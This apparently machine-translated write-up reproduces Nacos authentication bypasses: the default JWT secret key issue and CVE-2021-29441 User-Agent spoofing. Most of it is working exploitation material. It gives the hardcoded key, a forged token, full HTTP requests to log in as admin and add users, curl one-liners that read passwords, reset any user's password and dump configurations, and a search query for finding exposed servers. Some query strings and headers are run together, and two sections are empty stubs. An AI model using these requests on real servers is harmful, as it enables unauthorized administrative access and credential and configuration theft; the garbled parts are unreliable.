Nacos vulnerability summary recurrence

1. Nacos default key causes permission to bypass login

A problem affecting Nacos=2.1.0 was found in Nacos, and Nacos users using the default JWT key caused an unauthorized access vulnerability. Through this vulnerability, the attacker can bypass username and password authentication and log in to the Nacos user directly.

0x00 Vulnerability Description

0.1.0=Nacos=2.2.0

0x01 Vulnerability Impact

fofa: app='NACOS'

0x02 Vulnerability Search

In nacos, the token.secret.key value is fixed and dead, and the location is in application.properties under conf:

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

1. Get the token and use this default key to perform jwt construction and directly enter the background. The construction method:

In https://jwt.io/: Enter the default key:

SecretKey012345678901234567890123456789012345678901234567890123456789

Then enter in payload:

{

'sub': 'nacos',

'exp': 1678899909

}

Note here: The value of 1678899909 is a unix timestamp. If you want to convert it, it will be later than the current time in your system. For example, the current time is March 15, 2023 22:11:09, and the time stamp time here is March 16:

Notice:

The following are the test results of forging JWT values to bypass permissions

1. Extend timestamp, POST password is wrong, and username is correct

2. Extend timestamp, POST password, user name error

3. Delete the timestamp, the POST password is wrong, the user name is wrong

Copy the value obtained above, select login in burp and construct:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

You need to add it yourself in the box:

POST /nacos/v1/auth/users/login HTTP/1.1

Host: 10.211.55.5:8848

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 33

Origin: http://10.211.55.5:8848

Connection: close

Referer: http://10.211.55.5:8848/nacos/index.html

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

username=crowsecpassword=crowsec

At this time, I got the token information:

HTTP/1.1 200

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

Content-Security-Policy: script-src 'self'

Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

Content-Type: application/json

Date: Wed, 15 Mar 2023 14:13:22 GMT

Connection: close

Content-Length: 197

{'accessToken':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s','tokenTtl':18000,'globalAdmin':true,'username':'nacos'}

At this time, I got the token information of Nacos.

2. How to log in to the background by using token to log in? Here you need to log in with a fake account and then modify it and return to the package. Try it:

Log in with a fake account first, and use burp to intercept

This is definitely not accessible. Change the return package here and right-click to read this:

Then Forward, the information returned here is definitely invalid:

Here we use the return package generated in burp just now to replace it, and copy it all:

Forward again

Now that I've already entered:

3. Use the default key to generate JWT to view the current username and password GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7spageNo=1pageSize=9 HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0Accept-Encoding: gzip, deflateConnection: closeIf-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMTUpgrade-Insecure-Requests: 1accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s4.Use the default key, add hellonacos user password to hellonacos, and create it successfully

POST /nacos/v1/auth/users HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0Authorization: BearereyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7sAccept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 39

username=hellonacospassword=hellonacos

0x03 Vulnerability Recurrence

http://10.10.84.207:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=accurateaccessTokenhttp://your_ip:8848/nacos/v1/auth/users/?pageNo=1pageSize=9

2. Nacos default configuration unauthorized access vulnerability

Add serverIdentity

3. Nacos2.2.0 permission bypass

Adding serverIdentity If there is no or does not correspond, return 403

IV. Nacos1.x.x version User-Agent permission bypass ((CVE-2021-29441)

0x01 Vulnerability Description

In Nacos 1.4.1 and earlier, AuthFilter servlet filters are used to enforce authentication, thus skipping authentication checks. This mechanism relies on user-agent HTTP headers and is therefore easily spoofed. This issue may allow any user to perform any administrative tasks on the Nacos server.

0x02 Environment construction

docker run -d -p 8848:8848 hglight/cve-2021-29441

0x03 Vulnerability Impact

Nacos=1.4.1

0x04 Vulnerability recurrence

1. Modify the value of User-Agent to Nacos-Server to the request package, and after adding the Header header, visit http://target:8848/nacos/v1/auth/users?pageNo=1pageSize=9 You can see that the return value is 200, and whether the content contains pageItemsGET /nacos/v1/auth/users/?pageNo=1pageSize=9 HTTP/1.1

Host: 192.168.246.138:8848

User-Agent: Nacos-Server

Or use the command to access: read the user password: curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9accessToken=' -H 'User-Agent: Nacos-Server'curl'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=blur'-H'User-Agent:Nacos-Server'

curl'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=accurate'-H'User-Agent:Nacos-Server'Unauthorized addition of user curl-XPOST'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1password=test1' -H 'User-Agent:Nacos-Server any user password change curl-X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1newPassword=test2'Read configuration file curl-XGET'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accuratedataId=group=pageNo=1pageSize=99'curl-XGET'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blurdataId=group=pageNo=1pageSize=99'

After adding the Header header, use the POST method to request http://target:8848/nacos/v1/auth/users?username=vulhubpassword=vulhubAdd a new user, and the account password is vulhubPOST /nacos/v1/auth/users?username=hglightpassword=hglight HTTP/1.1

Host: 192.168.246.138:8848

User-Agent: Nacos-Server or POST /nacos/v1/auth/users HTTP/1.1Host: 192.168.31.64:8848Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Nacos-ServerAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 27username=hglightpassword=hglight View the user list again. In the returned user list data, there is an additional new user we created by bypass authentication.

GET /nacos/v1/auth/users/?pageNo=1pageSize=9 HTTP/1.1

Host: 192.168.246.138:8848

User-Agent: Nacos-Server Access http://IP:8848/nacos Log in with a new user, which means that the vulnerability is exploited successfully